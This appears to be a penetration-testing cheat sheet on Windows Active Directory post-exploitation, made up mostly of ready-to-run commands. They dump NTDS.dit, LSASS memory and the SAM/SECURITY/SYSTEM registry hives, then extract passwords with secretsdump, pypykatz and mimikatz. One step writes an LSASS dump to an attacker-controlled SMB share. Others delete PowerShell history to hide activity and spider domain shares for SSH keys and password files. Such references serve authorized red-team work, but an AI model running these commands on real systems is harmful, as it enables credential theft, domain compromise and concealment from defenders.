Skip to content

Post-Exploitation

Tools #


Dumping Credentials1 #

NTDS dumping #

Impacket-secretsdump directly #

1
secretsdump.py company.local/administrator:P\@[email protected] -outputfile secretsdump.txt -resumefile resumefile -pwd-last-set -user-status -history

Crackmapexec #

1
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --ntds DC01.acme.corp

ntdsutil23 #

1
2
3
4
5
6
ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\temp\ntdsutil" quit quit
# Via WMIC from a remote machine to DC
wmic /node:dc01.domain.com process call create "cmd.exe /c ntdsutil \"ac in ntds\" ifm \"cr fu C:\Windows\temp\ntdsutil\" q q"

# Then copy to kali and use secretsdump
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY LOCAL -pwd-last-set -user-status -history -outputfile output

Next steps #

Dumping LSASS #

  • Try to archive and compress before exiltrating.
  • After below, see Data Exfiltration
  • See Parsing LSASS below
  • Via procdump.exe
    1
    2
    procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
    procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
    
  • Via Task manager
    • Open Task Manager -> Details -> lsass.exe -> Right Button -> "Create dump file"
  • Rundll32 comsvcs (get PID)
    • Dump and exfiltrate later
      1
      C:\Windows\System32\rundll32.exe comsvcs.dll, MiniDump <pid> C:\Windows\temp\lsass.dmp full
      
    • Remote LSASS dump4
      • Run below on the target/victim machine
        1
        2
        net use x: \\smbserver_under_your_control\c$\
        powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lsassdump.bin full
        
  • Crackmapexec
    1
    2
    crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M nanodump victimPC01.acme.corp
    crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M handlekatz victimPC01.acme.corp
    

Parsing LSASS #

  1. Kali
    1
    pypykatz lsa -k ./kerberos minidump ./lsass.dmp
    
  2. Windows
    1
    mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
    

Exporting registry hives & local decryption #

  1. On the target machine

    1
    2
    3
    4
    mkdir c:\temp
    reg.exe save hklm\sam c:\temp\sam.save
    reg.exe save hklm\security c:\temp\security.save
    reg.exe save hklm\system c:\temp\system.save
    

  2. Retrieve the files

  3. On local machine (~Kali)

    1
    secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
    

  4. On target machine

    1
    2
    3
    4
    del c:\temp\sam.save
    del c:\temp\security.save
    del c:\temp\system.save
    rmdir c:\temp # Except when the "temp" folder already existed before Step 1. # Check if there are other contents in the folder
    


Delete Powershell history #

  • Delete the "file" given by this command:
    1
    (Get-PSReadlineOption).HistorySavePath
    
  • Or just replace the below
    1
    del C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    

Looking for files in the Domain #

  • Useful when
    • escalating from a domain compromise to a full network or infrastructure compromise by looking for sensitive files such as:
      • ssh keys
      • password files
      • offline password manager DB files
    • sensitive files in "authenticated" shares
      • Attempting to escalate privileges and pivot to other hosts/networks
  • About command:
    • spider = "*" to spider all shares per host
    • long list of --exclude-dirs to avoid scanning in the ADMIN$ or Windows folder and concentrate on other folders.
    • Edit the --pattern for more filename patterns
1
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --spider "*" --exclude-dirs "addins,ADFS,appcompat,apppatch,AppReadiness,assembly,bcastdvr,Boot,Branding,CbsTemp,Cluster,Containers,CSC,Cursors,debug,diagnostics,DiagTrack,DigitalLocker,dot3svc,Downloaded Program Files,drivers,en-US,Fonts,GameBarPresenceWriter,Globalization,Help,IdentityCRL,IME,ImmersiveControlPanel,INF,InputMethod,Installer,L2Schemas,LiveKernelReports,Logs,Media,Microsoft.NET,Migration,Minidump,ModemLogs,OCR,Offline Web Pages,Panther,Performance,PLA,PolicyDefinitions,Prefetch,PrintDialog,Program Files,Program Files (x86),Provisioning,Registration,RemotePackages,rescache,Resources,SchCache,schemas,security,ServiceProfiles,ServiceState,servicing,Setup,ShellComponents,ShellExperiences,SKB,SoftwareDistribution,Speech,Speech_OneCore,System,System32,SystemApps,SystemResources,SysWOW64,TAPI,Tasks,Temp,tracing,twain_32,Vss,WaaS,Web,Windows,WinSxS,wlansvc" --pattern passw ssh username id_rsa id_ed25519 .pub  --only-files ~/Scope/all.txt

Last update: April 16, 2022